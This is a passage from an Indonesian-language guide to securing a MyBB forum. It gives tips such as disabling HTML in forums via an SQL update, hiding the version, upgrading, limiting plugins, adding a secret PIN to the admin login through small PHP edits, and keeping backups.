masuk PhpMyAdmin lalu run query dibawah ini :

UPDATE `mybb_forums` SET `allowhtml` = '0';

Setelah itu, masuk ke ACP > Tools & Maintenance > Cache Manager > forums > Rebuild Cache. selsesai

8. menyembunyikan versi MyBB
Jika kalian tidak menyembunyikn versi mybb kalian hacker akan lebih mudah mencari mybb sasarannya

9. Tetap up-to-date dengan mengikuti Milis MyBB
Agar kalian tidak ketinggalan info lebih baik anda mengikuti milis

10. upgrade ke versi yang baru
Bila mybb merilis versi yang baru berarti ditemukan bug di versi sebelumnya jadi kalian harus mengupgradenya

11. Jangan terlalu banyak menggunakan Plugin
Penggunaan banyak plugins bsa menimbulkan bug jadi lebih baik secukupnya saja

12. Manambahkan Pin di admin login

1. Edit directory di /admin/inc/class_page.php (itu kalau klian masih menggunakan direktori admin default)
cari code:

<div class="label"{$login_label_width}><label for="password">{$lang->password}</label></div>
<div class="field"><input type="password" name="password" id="password" class="text_input" /></div>

dan ganti dengan begini :

<div class="label"{$login_label_width}><label for="password">{$lang->password}</label></div>
<div class="field"><input type="password" name="password" id="password" class="text_input" /></div>
<div class="label"{$login_label_width}><label for="pin">Secret PIN</label></div>
<div class="field"><input type="password" name="pin" id="pin" class="text_input" /></div>

2. Edit Di Directory /admin/index.php
cari code ini :

if($user['uid'])
{
$query = $db->simple_select("users", "*", "uid='".$user['uid']."'");
$mybb->user = $db->fetch_array($query);
}

trus ganti dengan ini :

if($user['uid'])
{
$query = $db->simple_select("users", "*", "uid='".$user['uid']."'");
$mybb->user = $db->fetch_array($query);
}
if (isset($config['acp_pin']) && $mybb->input['pin'] != $config['acp_pin']) {
$default_page->show_login("Invalid PIN","error");
}

3. Edit di Directory ./inc/config.php latak kan code di bawah ini dimana saja

$config['acp_pin'] = 'pinnya';

Ganti $config['acp_pin'] = 'pinnya'; dengan pin kalian

13. BACKUP
Kalau bisa anda harus rajin melakukan backup data dan Mysql agar lebih menjaga lagi dan merasa lebih aman kembali